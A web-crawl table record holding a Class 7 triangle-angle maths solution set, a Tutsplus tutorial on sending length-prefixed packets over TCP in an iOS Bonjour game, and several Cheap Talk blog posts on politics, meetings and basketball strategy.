url
stringlengths 14
2.42k
| text
stringlengths 100
1.02M
| date
stringlengths 19
19
| metadata
stringlengths 1.06k
1.1k
|
---|---|---|---|
https://gsebsolutions.in/gseb-solutions-class-7-maths-chapter-6-ex-6-3/ | # GSEB Solutions Class 7 Maths Chapter 6 The Triangles and Its Properties Ex 6.3
Gujarat Board GSEB Textbook Solutions Class 7 Maths Chapter 6 The Triangles and Its Properties Ex 6.3 Textbook Questions and Answers.
## Gujarat Board Textbook Solutions Class 7 Maths Chapter 6 The Triangles and Its Properties Ex 6.3
Question 1.
Find the value of the unknown x in the following diagrams.
Solution:
(i) Using the angle sum property of a ‘triangle’ we have
50° + 60° + x = 180°
or 110° + x = 180°
or x = 180° – 110° = 70°
Thus, the required value of x is 70°.
(ii) Using the ‘angle sum property of a triangle’,
we have
30° + 90° + x = 180°
[the ∆ is right angled at P.]
or 120° + x = 180°
or x = 180° – 120° = 60°
Thus, the required value of x is 60°.
(iii) Using the ‘angle sum property of a triangle’, we have
30° + 110° + x = 180°
or 140° + x = 180°
or x = 180° – 140° = 40°
Thus, the required value of x is 40°.
(iv) Using the ‘angle sum property of a triangle’,
we have
x + x + 50° = 180°
∴ 2x + 50° = 180°
or 2x = 180° – 50° = 130°
or $$\frac { 2x }{ 2 }$$ = $$\frac { 130° }{ 2 }$$
or x = 65°
(v) Using the ‘angle sum property of a triangle’, we have
x + x + x = 180°
or 3x = 180°
or $$\frac { 3x }{ 3 }$$ = $$\frac { 180° }{ 3 }$$
or x = 60°
(vi) Using the ‘angle sum property of a triangle’, we have
x + 2x + 90° =180°
or 3x + 90° = 180°
or 3x = 180° – 90° = 90°
or $$\frac { 3x }{ 3 }$$ = $$\frac { 90° }{ 3 }$$
[Dividing both sides by 3]
or x = 30°
Question 2.
Find the values of the unknown x and y in the following diagrams:
Solution:
(i) ∵ Angles y and 120° form a linear pair.
∴ y + 120° = 180°
or y = 180° – 120° = 60°
Now, using the angle sum property of a triangle, we have
x + y + 50° = 180°
or x + 60° + 50° = 180°
or x + 110° =180°
or x = 180° – 110° = 70°
Thus, $$\left.\begin{array}{l} x=70^{\circ} \\ y=60^{\circ} \end{array}\right\}$$
(ii) ∵ y and 80° angle are vertically opposite angles, then y = 80°
Now x + y + 50° = 180°
[Using angle sum property]
or x + 80° + 50° = 180°
or x + 130° = 180°
or x = 180° – 130° = 50°
Thus, $$\left.\begin{array}{l} x=50^{\circ} \\ y=80^{\circ} \end{array}\right\}$$
(iii) Using the angle sum property of triangle, we have
50° + 60° + y = 180°
or y + 110° = 180°
or y = 180° – 110° = 70°
Again, x and y form a linear pair.
∴ x + y = 180°
or x + 70° = 180°
or x = 180° – 70° = 110°
Thus, $$\left.\begin{array}{l} x=110^{\circ} \\ y=70^{\circ} \end{array}\right\}$$
(iv) ∵ x and 60° angle are vertically opposite angles
∴ x = 60°
Now, using the angle sum property of triangle, we have
x + y + 30° = 180°
or 60 + y + 30° = 180°
or y + 90° = 180°
or y = 180° – 90° =
Thus, $$\left.\begin{array}{l} x=60^{\circ} \\ y=90^{\circ} \end{array}\right\}$$
(v) ∵ y and 90° are vertically opposite angles, then y = 90°
Now, using the angle sum property of triangles, we have
x + x + y = 180°
2x + y = 180°
or 2x + 90° = 180°
or 2x = 180° – 90° = 90°
or $$\frac { 2x }{ 2 }$$ = $$\frac { 90° }{ 2 }$$ or x = 45°
Thus, $$\left.\begin{array}{l} x=45^{\circ} \\ y=90^{\circ} \end{array}\right\}$$
(vi) One angle of the triangle = y
Each of the other two angles is equal to their vertically opposite angle x.
∴ Using the angle sum property
x + x + y = 180°
or 2x+ y = 180°
or 2x + x = 180°
[x = y vertically opposite angles]
or 3x = 180°
or $$\frac { 3x }{ 3 }$$ = $$\frac { 180° }{ 3 }$$
∴ x = 60°
But y = x
∴ y = 60°
Thus, $$\left.\begin{array}{l} x=60^{\circ} \\ y=60^{\circ} \end{array}\right\}$$ | 2022-08-15 10:31:53 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8693941831588745, "perplexity": 3648.748624847034}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572163.61/warc/CC-MAIN-20220815085006-20220815115006-00463.warc.gz"} |
https://code.tutsplus.com/tutorials/creating-a-game-with-bonjour-sending-data--mobile-16437 | Unlimited Plugins, WordPress themes, videos & courses! Unlimited asset downloads! From \$16.50/m
# Creating a Game With Bonjour: Sending Data
Difficulty:IntermediateLength:LongLanguages:
In the previous article, we laid the foundation of the network component of the game by enabling a user to host or join a game. At the end of the tutorial, we successfully established a connection between two devices running the application separately. In this tutorial, we will take a closer look at how we send data from one socket to another.
## Introduction
As we saw in the previous tutorial, the CocoaAsyncSocket library makes working with sockets quite easy. However, there is more to the story than sending a simple string from one device to another, as we did in the previous tutorial. In the first article of this series, I wrote that the TCP protocol can manage a continuous stream of data in two directions. The problem, however, is that it is literally a continuous stream of data. The TCP protocol takes care of sending the data from one end of the connection to the other, but it is up to the receiver to make sense of what is being sent through that connection.
There are several solutions to this problem. The HTTP protocol, which is built on top of the TCP protocol, sends an HTTP header with every request and response. The HTTP header contains information about the request or response, which the receiver can use to make sense of the incoming stream of data. One key component of the HTTP header is the length of the body. If the receiver knows the length of the body of the request or response, it can extract the body from the incoming stream of data.
The strategy that we will be using differs from how the HTTP protocols operates. Every packet of data that we send through the connection is prefixed with a header that has a fixed length. The header is not as complex as an HTTP header. The header that we will be using contains one piece of information, the length of the body or packet that comes after the header. In other words, the header is nothing more than a number that informs the receiver of the length of the body. With that knowledge, the receiver can successfully extract the body or packet from the incoming stream of data. Even though this is a simple approach, it works surprisingly well as you will see in this tutorial.
## 1. Packets
It is important to understand that the above strategies are tailored to the TCP protocol and they only work because of how the TCP protocol operates. The TCP protocol does its very best to ensure that every packet reaches its destination in the order that it was sent; thus, the strategies that I have outlined work very well.
### Step 1: Creating the Packet Class
Even though we can send any type of data through a TCP connection, it is recommended to provide a custom structure to hold the data we would like to send. We can accomplish this by creating a custom packet class. The advantage of this approach becomes evident once we start using the packet class. The idea is simple, though. The class is an Objective-C class that holds data; the body, if you will. It also includes some extra information about the packet, called the header. The main difference with the HTTP protocol is that the header and body are not strictly separated. The packet class will also need to conform to the NSCoding protocol, which means that instances of the class can be encoded and decoded. This is key if we want to send instances of the packet class through a TCP connection.
Create a new Objective-C class, make it a subclass of NSObject, and name it MTPacket (figure 1). For the game that we are building, the packet class can be fairly simple. The class has three properties, type, action, and data. The type property is used to identify the purpose of the packet while the action property contains the intention of the packet. The data property is used to store the actual contents or load of the packet. This will all become clearer once we start using the packet class in our game.
Take a moment to inspect the interface of the MTPacket class shown below. As I mentioned, it is essential that instances of the class can be encoded and decoded by conforming to the NSCoding protocol. To conform to the NSCoding protocol, we only need to implement two (required) methods, encodeWithCoder: and initWithCoder:.
Another important detail is that the type and action properties are of type MTPacketType and MTPacketAction, respectively. You can find the type definitions at the top of MTPacket.h. If you are not familiar with typedef and enum, you can read more about it at Stack Overflow. It will make working with the MTPacket class a lot easier.
The class' data property is of type id. This means that it can be any Objective-C object. The only requirement is that it conforms to the NSCoding protocol. Most members of the Foundation framework, such as NSArray, NSDictionary, and NSNumber, conform to the NSCoding protocol.
To make it easy to initialize instances of the MTPacket class, we declare a designated initializer that takes the packet's data, type, and action as arguments.
The implementation of the MTPacket class shouldn't be too difficult if you are familiar with the NSCoding protocol. As we saw earlier, the NSCoding protocol defines two methods and both are required. They are automatically invoked when an instance of the class is encoded (encodeWithCoder:) or decoded (initWithCoder:). In other words, you never have to invoke these methods yourself. We will see how this works a bit later in this article.
As you can see below, the implementation of the designated initializer, initWithData:type:action: couldn't be easier. In the implementation file, it also becomes clear why we declared three string constants in the class's interface. It is good practice to use constants for the keys you use in the NSCoding protocol. The primary reason isn't performance, but typing errors. The keys that you pass when encoding the class's properties need to be identical to the keys that are used when decoding instances of the class.
### Step 2: Sending Data
Before we move on to the next piece of the puzzle, I want to make sure that the MTPacket class works as expected. What better way to test this than by sending a packet as soon as a connection is established? Once this works, we can start refactoring the network logic by putting it in a dedicated controller.
When a connection is established, the application instance hosting the game is notified of this by the invocation of the socket:didAcceptNewSocket: delegate method of the GCDAsyncSocketDelegate protocol. We implemented this method in the previous article. Take a look at its implementation below to refresh your memory. The last line of its implementation should now be clear. We tell the new socket to start reading data and we pass a tag, an integer, as the last parameter. We don't set a timeout (-1) because we don't know when we can expect the first packet to arrive.
What really interests us, however, is the first argument of readDataToLength:withTimeout:tag:. Why do we pass sizeof(uint64_t) as the first argument?
The sizeof function returns the length in bytes of the function's argument, uint64_t, which is defined in stdint.h (see below). As I explained earlier, the header that precedes every packet that we send has a fixed length (figure 2), which is very different from the header of an HTTP request or response. In our example, the header has only one purpose, telling the receiver the size of the packet that it precedes. In other words, by telling the socket to read incoming data the size of the header (sizeof(uint64_t)), we know that we will have read the complete header. By parsing the header once it's been extracted from the incoming stream of data, the receiver knows the size of the body that follows the header.
Import the header file of the MTPacket class and amend the implementation of socket:didAcceptNewSocket: as shown below (MTHostGameViewController.m). After instructing the new socket to start monitoring the incoming stream of data, we create an instance of the MTPacket class, populate it with dummy data, and pass the packet to the sendPacket: method.
As I wrote earlier, we can only send binary data through a TCP connection. This means that we need to encode the MTPacket instance we created. Because the MTPacket class conforms to the NSCoding protocol, this isn't a problem. Take a look at the sendPacket: method shown below. We create a NSMutableData instance and use it to initialize a keyed archiver. The NSKeyedArchiver class is a subclass of NSCoder and has the ability to encode objects conforming to the NSCoding protocol. With the keyed archiver at our disposal, we encode the packet.
We then create another NSMutableData instance, which will be the data object that we will pass to the socket a bit later. The data object, however, does not only hold the encoded MTPacket instance. It also needs to include the header that precedes the encoded packet. We store the length of the encoded packet in a variable named headerLength which is of type uint64_t. We then append the header to the NSMutableData buffer. Did you spot the & symbol preceding headerLength? The appendBytes:length: method expects a buffer of bytes, not the value of the headerLength value. Finally, we append the contents of packetData to the buffer. The buffer is then passed to writeData:withTimeout:tag:. The CocoaAsyncSocket library takes care of the nitty gritty details of sending the data.
### Step 3: Receiving Data
To receive the packet we just sent, we need to modify the MTJoinGameViewController class. Remember that in the previous article, we implemented the socket:didConnectToHost:port: delegate method. This method is invoked when a connection is established after the client has joined a game. Take a look at its original implementation below. Just as we did in the MTHostGameViewController class, we tell the socket to start reading data without a timeout.
When the socket has read the complete header preceding the packet data, it will invoke the socket:didReadData:withTag: delegate method. The tag that is passed is the same tag in the readDataToLength:withTimeout:tag: method. As you can see below, the implementation of the socket:didReadData:withTag: is surprisingly simple. If tag is equal to 0, we pass the data variable to parseHeader:, which returns the header, that is, the length of the packet that follows the header. We now know the size the encoded packet and we pass that information to readDataToLength:withTimeout:tag:. The timeout is set to 30 (seconds) and the last parameter, the tag, is set to 1.
Before we look at the implementation of parseHeader:, let's first continue our exploration of socket:didReadData:withTag:. If tag is equal to 1, we know that we have read the complete encoded packet. We parse the packet and repeat the cycle by telling the socket to watch out for the header of the next packet that arrives. It is important that we pass -1 for timeout (no timeout) as we don't know when the next packet will arrive.
In the parseHeader: method, the memcpy function does all the heavy lifting for us. We copy the contents of data in the variable headerLength of type uint64_t. If you are not familiar with the memcpy function, you can read more about it here.
In parseBody:, we do the reverse of what we did in the sendPacket: method in the MTHostGameViewController class. We create an instance of NSKeyedUnarchiver, pass the data we read from the read stream, and create an instance of MTPacket by decoding the data using the keyed unarchiver. To prove that everything works as it should, we log the packet's data, type, and action to the Xcode console. Don't forget to import the header file of the MTPacket class.
Run two instances of the application. Host a game on one instance and join that game on the other instance. You should see the contents of the packet being logged to the Xcode console.
## 2. Refactoring
It isn't convenient to put the networking logic in the MTHostGameViewController and MTJoinGameViewController classes. This will only give us problems down the road. It is more appropriate to use MTHostGameViewController and MTJoinGameViewController for establishing the connection and passing the connection - the socket - to a controller that is in charge of the control and flow of the game.
The more complex a problem is, the more solutions a problem has and those solutions are often very specific to the problem. In other words, the solution presented in this article is a viable option, but don't consider it as the only solution. For one of my projects, Pixelstream, I have also been using Bonjour and the CocoaAsyncSocket library. My approach for that project, however, is very different than the one I present here. In Pixelstream, I need to be able to send packets from various places in the application and I have therefore chosen to use a single object that manages the connection. In combination with completion blocks and a packet queue, this solution works very well for Pixelstream. In this article, however, the setup is less complicated because the problem is fairly simple. Don't overcomplicate things if you don't have to.
The strategy that we will use is simple. Both the MTHostGameViewController and MTJoinGameViewController classes have a delegate that is notified when a new connection is established. The delegate will be our MTViewController instance. The latter will create a game controller, an instance of the MTGameController class, that manages the connection and the flow of the game. The MTGameController class will be in charge of the connection: sending and receiving packets as well as taking appropriate action based on the contents of the packets. If you were to work on a more complex game, then it would be good to separate network and game logic, but I don't want to overcomplicate things too much in this example project. In this series, I want to make sure that you understand how the various pieces fit together so that you can adapt this strategy to whatever project you are working on.
### Step 1: Creating Delegate Protocols
The delegate protocols that we need to create are not complex. Each protocol has two methods. Even though I am allergic to duplication, I think it is useful to create a separate delegate protocol for each class, the MTHostGameViewController and MTJoinGameViewController classes.
The declaration of the delegate protocol for the MTHostGameViewController class is shown below. If you have created custom protocols before, then you won't find any surprises.
The delegate protocol declared in the MTJoinGameViewController class is almost identical. The only differences are the method signatures of the delegate methods.
We also need to update the hostGame: and joinGame: actions in the MTViewController class. The only change we make is assigning the MTViewController instance as the delegate of the MTHostGameViewController and MTJoinGameViewController instances.
This also means that the MTViewController class needs to conform to the MTHostGameViewControllerDelegate and MTJoinGameViewControllerDelegate delegate protocols and implement the methods of each protocol. We will take a look at the implementation of these delegate methods in a few moments. First, I would like to continue refactoring the MTHostGameViewController and MTJoinGameViewController classes.
### Step 2: Refactoring MTHostGameViewController
The first thing that we need to do is update the socket:didAcceptNewSocket: delegate method of the GCDAsyncSocket delegate protocol. The method becomes much simpler because the work is moved to the delegate. We also invoke endBroadcast, a helper method that we will implement in a moment. When a connection is established, we dismiss the host view controller and the game can start.
In endBroadcast, we make sure that we clean everything up. This is also a good moment to update the cancel: action that we left unfinished in the previous article.
In the cancel: action, we notify the delegate by invoking the second delegate method and we also invoke endBroadcast as we did earlier.
Before continuing our refactoring spree, it is good practice to clean things up in the view controller's dealloc method as shown below.
### Step 3: Refactoring MTJoinGameViewController
Similar to what we did in the socket:didAcceptNewSocket: method, we need to update the socket:didConnectToHost:port: method as shown below. We notify the delegate, stop browsing for services, and dismiss the view controller.
We also update the cancel: and dealloc methods as we did in the MTHostGameViewController class.
To make sure that we didn't break anything, implement the delegate methods of both protocols in the MTViewController class as shown below and run two instances of the application to test if we didn't break anything. If all goes well, you should see the appropriate messages being logged to the Xcode console and the modal view controllers should automatically dismiss when a game is joined, that is, when a connection is established.
## 3. Implementing the Game Controller
### Step 1: Creating the Game Controller Class
The MTViewController class will not be in charge of handling the connection and the game flow. A custom controller class, MTGameController will be in charge of this. One of the reasons for creating a separate controller class is that once the game has started, we won't make a distinction between server and client. It is therefore appropriate to have a controller that is in charge of the connection and the game, but that doesn't differentiate between the server and the client. Another reason is that the only responsibility of the MTHostGameViewController and MTJoinGameViewController classes is finding players on the local network and establishing a connection. They shouldn't have any other responsibilities.
Create a new NSObject subclass and name it MTGameController (figure 3). The interface of the MTGameController class is pretty straightforward as you can see below. This will change once we start implementing the game logic, but this will do for now. The designated initializer takes one argument, the GCDAsyncSocket instance that it will be managing.
Before we implement initWithSocket:, we need to create a private property for the socket. Create a class extension as shown below and declare a property of type GCDAsyncSocket named socket. I have also taken the liberty to import the header file of the MTPacket class and define TAG_HEAD and TAG_BODY to make it easier to work with tags in the GCDAsyncSocketDelegate delegate methods. Of course, the MTGameController class needs to conform to the GCDAsyncSocketDelegate delegate protocol to make everything work.
The implementation of initWithSocket: is shown below and shouldn't be too surprising. We store a reference to the socket in the private property we just created, set the game controller as the socket's delegate, and tell the socket to start reading incoming data, that is, intercept the first header that arrives.
The remainder of the refactoring process isn't complicated either because we already did most of the work in the MTHostGameViewController and MTJoinGameViewController classes. Let's start by taking a look at the implementation of the GCDAsyncSocketDelegate delegate protocol. The implementation doesn't differ from what we saw earlier in the MTHostGameViewController and MTJoinGameViewController classes.
The implementation of sendPacket:, parseHeader:, and parseBody: aren't any different either.
The parseBody: method will play an important role a bit later in the story, but this will do for now. Our goal at this point is to get everything working again after the refactoring process is complete.
Before we move on, it is important to implement the dealloc method of the MTGameController class as shown below. Whenever the game controller is deallocated, the instance needs to break the connection by calling disconnect on the GCDAsyncSocket instance.
### Step 2: Creating Another Delegate Protocol
The MTViewController class will manage the game controller and interact with it. The MTViewController will display the game and let the user interact with it. The MTGameController and MTViewController instances need to communicate with one another and we will use another delegate protocol for that purpose. The communication is asymmetric in that the view controller knows about the game controller, but the game controller doesn't know about the view controller. We will expand the protocol as we go, but for now the view controller should only be notified when the connection is lost.
Revisit MTGameController.h and declare the delegate protocol as shown below. In addition, a public property is created for the game controller's delegate.
We can immediately put the delegate protocol to use by notifying the game controller's delegate in one of the GCDAsyncSocketDelegate delegate methods, socketDidDisconnect:withError: to be precise.
### Step 3: Updating the MTViewController Class
The final piece of the refactoring puzzle is putting the MTGameController to use. Create a private property in the MTViewController class, conform the MTViewController class to the MTGameControllerDelegate protocol, and import the header file of the MTGameController class.
In controller:didHostGameOnSocket: and controller:didJoinGameOnSocket:, we invoke startGameWithSocket: and pass the socket of the new connection.
In the startGameWithSocket: helper method, we instantiate an instance of the MTGameController class by passing the socket and store a reference of the game controller in the view controller's gameController property. The view controller also serves as the game controller's delegate as we discussed earlier.
In the controllerDidDisconnect: delegate method of the MTGameControllerDelegate protocol we invoke the endGame helper method in which we clean the game controller up.
To make sure that everything works, we should test our setup. Let's open the XIB file of the MTViewController and add another button in the top left titled Disconnect (figure 4). The user can tap this button when she wants to end or leave the game. We show this button only when a connection has been established. When a connection is active, we hide the buttons to host and join a game. Make the necessary changes in MTViewcontroller.xib (figure 4), create an outlet for each button in MTViewController.h, and connect the outlets in MTViewcontroller.xib.
Finally, create an action named disconnect: in MTViewController.m and connect it with the button title Disconnect.
In the setupGameWithSocket: method, we hide hostButton and joinButton, and we show disconnectButton. In the endGame method, we do the exact opposite to make sure that the user can host or join a game. We also need to hide the disconnectButton in the view controller's viewDidLoad method.
To test if everything still works, we need to send a test packet as we did a bit earlier in this article. Declare a method named testConnection in MTGameController.h and implement it as shown below.
The view controller should invoke this method whenever a new connection has been established. A good place to do this is in the controller:didHostGameOnSocket: delegate method after the game controller has been initialized.
Run the application once more to verify that everything is still working after the refactoring process.
## 4. Cleaning Up
It is now time to clean up the MTHostGameViewController and MTJoinGameViewController classes by getting rid of any code that no longer belongs in these classes. For the MTHostGameViewController class, this means removing the sendPacket: method and for the MTJoinGameViewController class, this means removing the socket:didReadData:withTag: method of the CocoaAsyncSocketDelegate delegate protocol as well as the code>parseHeader: and parseBody: helper methods.
## Summary
I can imagine that this article has left you a bit dazed or overwhelmed. There was a lot to take in and process. However, I want to emphasize that the complexity of this article was primarily due to how the application itself is structured and not so much how to work with Bonjour and the CocoaAsyncSocket library. It is often a real challenge to architect an application in such a way that you minimize dependencies and keep the application lean, performant, and modular. This is the main reason why we refactored our initial implementation of the network logic.
We now have a view controller that takes care of displaying the game to the user (MTViewController) and a controller (MTGameController) that handles the game and connection logic. As I mentioned earlier, it is possible to separate connection and game logic by creating a separate class for each of them, but for this simple application that isn't necessary.
## Conclusion
We've made significant progress with our game project, but there is one ingredient missing...the game! In the next installment of this series, we will create the game and leverage the foundation that we've created so far. | 2021-04-22 22:49:20 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.18631073832511902, "perplexity": 970.1082864074648}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618039563095.86/warc/CC-MAIN-20210422221531-20210423011531-00560.warc.gz"} |
https://cheaptalk.org/ | NYT on whether to filibuster Gorsuch now or wait:
The substantive stakes now are relatively low: Judge Gorsuch appears to be very conservative, but so was Justice Scalia. Confirming Judge Gorsuch would merely preserve the ideological status quo on the closely divided Supreme Court. Should the confirmation move ahead, all 52 Republican senators will probably stick together, bolstered by a few Democrats from conservative-leaning states. Those are enough votes to easily clear the way for confirming Judge Gorsuch — and all future nominees — by a simple majority.
But the dynamics could play out differently in a second situation: Judge Gorsuch is confirmed, but the filibuster rule survives. If Mr. Trump then gets to nominate a successor to a moderate or liberal justice, the substantive stakes would be much higher.
The framing for the filibuster fight would be different at that point. It would focus on whether the nominee would provide a fifth vote to overrule the Roe v. Wade abortion rights precedent and create a new conservative majority on other highly charged topics, like guns, affirmative action and the rights of same-sex couples.
Under that second possibility, it may not be inevitable that the filibuster rule falls. Red-state Democrats would be less likely to break ranks, and institutionalist or moderate Republican senators, like Susan Collins of Maine and Lisa Murkowski of Alaska, might be more reluctant to vote to change the chamber’s longstanding rules.
If red state Democrats and Collins and Murkowski can do backward induction, filibustering now or later is equivalent.
Also, if Republicans use the “nuclear option”, this reveals their type to Kennedy who may then defer retirement so he is not replaced by a Trump appointee.
A few weeks ago, I went to a meeting.
There was a part of the meeting where some open-ended information was disseminated and very general comments were sought. Now, one possibility when you make a comment is that it leads to interesting responses and a “whole if bigger than the sum of the parts” dynamic develops. Let us call this the brainstorming case. (This is the scenario that is meant to occur in research seminars.)
Much more likely is the “every action has an equal reaction” case where you talk, others respond but really the discussion goes nowhere and you wish no-one had talked in the first place. Let us called this the BS case. Casual empiricism suggests that the BS case is much more common than the brainstorming case.
This fact implies that comments should be taxed to internalize the negative externality but with taxation impossible we have to rely on morality to create incentives. Any moral individual should take into account the horrific effect of their casual comments. Even a rational decision-maker should take the negative feedback loop into account – in this sense, the BS case helps rational individuals take the horrific effects of talking at meetings into account. However, even this does not account for the acute suffering of the innocent by-listener so the moral individual should ratchet up the threshold for talking yet further.
Of course, this does not happen. There are always one or two people who have to talk. This is valuable not because of what they say but because of what others do not say. Namely, the people who do NOT talk are to be celebrated. They either see through the logic above and are quite moral or, to add another dimension, they are nice and kind of shy. Either case, these are nice people. Hang out with them. Meetings with just these people might be quite productive so put them on committees.
There was 20 seconds left, Vanderbilt had just scored a layup to go ahead by 1 and Northwestern’s Bryant Mcintosh was racing to midcourt to set-up a final chance to regain the lead and win the game. Vanderbilt’s Matthew Fisher-Davis intentionally fouled him, sending McIntosh to the line and the commentators and all of social media into a state of bewilderment. Yes, we understand intentionally fouling when you are down 1 with 20 seconds to go, but when you are ahead by 1?
But it was a brilliant move and it failed only because the worst-case scenario (for Vanderbilt) realized: McIntosh made two clutch free throws and Vanderbilt did not score on the ensuing possession.
(Before we get into the analysis, a simple way to understand the logic of the play is to notice that intentionally fouling late in the game very often is the right strategic move when you are down by a few points and there is no reason that should change precipitously when the point differential goes from slightly negative to slightly positive.The tactic is based on a tradeoff between giving away (random) points and getting (for sure) possession. The factors in that tradeoff are continuous as a function of the current scoring margin.)
Let $p$ be the probability that a team scores (at least two points) on a possession. Let $q$ be the probability that Bryant McIntosh makes a free throw. Roughly, the probability that Vanderbilt wins if they do not foul is $1-p$ because Northwestern is going to play for the final shot and win if they make a field goal.
What is the probability that Vanderbilt wins when Fisher-Davis fouls? There are multiple, mutually-exclusive ways they could win. First, McIntosh might miss both free-throws. This happens with probability $(1-q)^2$. The other simple case is McIntosh makes both free-throws, a probability $q^2$ event, in which case Vanderbilt wins by scoring on the following possession, which they do with probability $p$. Thus, the total probability Vanderbilt wins in this second case is $q^2p$.
The third possibility is McIntosh makes one free-throw. This has probability $2q(1-q)$. (I am pretty sure McIntosh was shooting two, i.e. Northwestern was in the double bonus, but if it was a one-and-one this would make Fisher-Davis’ case even stronger.) Now there are two sub-cases. First, Vanderbilt could score on the ensuing and win. Second, even if they don’t score, it will be tied and the game will be sent into overtime. Let’s say Vanderbilt wins with probability $1/2$ in overtime, a conservative number since Vanderbilt had all the momentum at that stage of the game.
Then the total probability of a Vanderbilt win in this third case is $2q(1-q)\left[ p + \frac{1-p}{2}\right]$. Adding up all of these probabilities, Vanderbilt wins using the Fisher-Davis foul with probability
$(1-q)^2 + 2q(1-q)\left[ p + \frac{1-p}{2}\right] + q^2p$
Fisher-Davis made the right move provided the above expression exceeds $1-p$. Let’s start by noticing some basic properties. First, if $p = 1$ then fouling is always the right move, no matter what $q$ is. (If Northwestern is going to score for sure, you want to foul and get possession so that you can score for sure and win.) If $q = 0$ then again fouling is the right strategy, regardless of $p$. (If he’s going to miss his free-throws then send him to the line.)
Next, notice that the probability Vanderbilt wins when Fisher-Davis fouls is monotonically increasing in $p$. Since the probability $(1-p)$ Vanderbilt wins without fouling is decreasing in $p$, the larger it is the better the Fisher-Davis gambit looks.
Finally, even if $q = 1$, so that McIntosh is surely going to sink two free-throws, Fisher-Davis made the right move as long as $p > 1/2$.
Ok so what are the actual values of $p$ and $q$. McIntosh is an 85% free-throw shooter so $q = .85$. Its harder to estimate $p$ but here are some guidelines. First, both teams were scoring (at least two points) on just about every possession down the stretch of that game. An estimate based on the last 3 minutes of data would put $p$ at at least $.7$, in any case certainly larger than $1/2$.
More generally, I googled a bit and found something basketball stat guys call offensive efficiency. It’s an estimate of the number of points scored per possession. Northwestern and Vanderbilt have very similar numbers here, about 1.03. A crude way to translate that into the number we are interested, namely probability of at least 2 points in a possession, is to simply divide that number in half, again giving $p > 1/2$. (This would be exactly right if you could only ever score 2 points. But of course there are three-point possessions and one-point possessions.) A third way is to notice that Northwestern was shooting a 49% field goal percentage for the game. This doesn’t equal field goals per possession of course because some possessions lead to turnovers hence no field goal attempt, and on the other side some possessions lead to multiple field goal attempts due to offensive rebounds.
So as far as I know there isn’t one convincing measure of $p$ but its pretty reasonable to put it above $p = 0.5$ at that phase of the game. This would be enough to justify Fisher-Davis even if McIntosh was certain to make both free throws. (I used Wolfram Alpha to figure out what $p$ would be required given the precise value $q = .85$ and it is about .45).
Finally, even if $p$ is below $.45$ say around $.4$ it means that the foul lowered Vanderbilt’s win probability but not bvery much at all. Probably less than every single time in the game that someone missed a shot. Certainly less than a few seconds later when LaChance missed the winning shot on the final possession. Its interesting how in close games the specific things we focus our attention on when in fact pretty much every single play in the game turned out to be pivotal.
Here is a passage from Ariel’s interesting and thought-provoking review:
“The following famous quote is taken from a letter written by John Maynard Keynes to Roy Harrod in 1938: “It seems to me that economics is a branch of logic, a way of thinking”; “Economics is a science of thinking in terms of models joined to the art of choosing models which are relevant to the contemporary world.” Economists enjoy discussing this question. I sometimes wonder if the question of whether economics is a science is about the commitment of economics to certain standards or whether it is actually about gaining entry into that prestigious club called Science.
Dani takes the question seriously and declares: “Models make economics a science” (p. 45). He rejects what he describes as the most common justification given by economists for calling economics a science: “It’s a science because we work with the scientific method: we build hypotheses and then test them. When a theory fails the test, we discard it and either replace it or come up with an improved version.” Dani’s response: “This is a nice story, but it bears little relationship to what economists do in practice. . . ” (p. 64). He also admits that “. . . [economic] methods are as much craft as they are science. Good judgment and experience are indispensable, and training can only get you so far. Perhaps as a consequence, graduate programs in economics pay very little attention to craft” (p. 83).”
Here is the link.
In Chicago Tribune (edited by paper in some ways that make it less clear!).
Main Point: Way Trump reacts to #grabyourwallet campaign against Nordstrom shows he is (1) easily provokable and (2) emotionally connected to his “brand”.
Terrorists as much as activists aim to provoke and have learned that Trump-branded properties worldwide are good targets if they aim to inflame Trump.
On Brexit
On worst restaurant in the world
Interesting WashPo article re Germany truck attack:
Islamic State officials have explicitly sought to link such attacks to the larger goal of making Europe intolerable for faithful Muslims. A 2015 article in the group’s English-language magazine, Dabiq, warned that the terrorists would soon begin targeting the West with the aim of deliberately provoking a backlash against Muslims living there.
“Muslims in the West,” the article said, “will quickly find themselves between one of two choices: they either apostatize and adopt the [Western] religion . . . or they emigrate to the Islamic State and thereby escape persecution.”
Somewhat consistent with our paper but generates some new questions – unlike Al Qaeda, ISIS is a near state not a terrorist group. The main threat to its survival is Western tacit support to a Putin-Assad (and Trump?) coalition against ISIS. If these terrorists attacks lead to such a coalition, provocation will backfire.
My prediction for the Trump Presidency is still that it will be a Bush Presidency with some Trumpian twists (e.g. infrastructure spending). But there is a worse scenario.
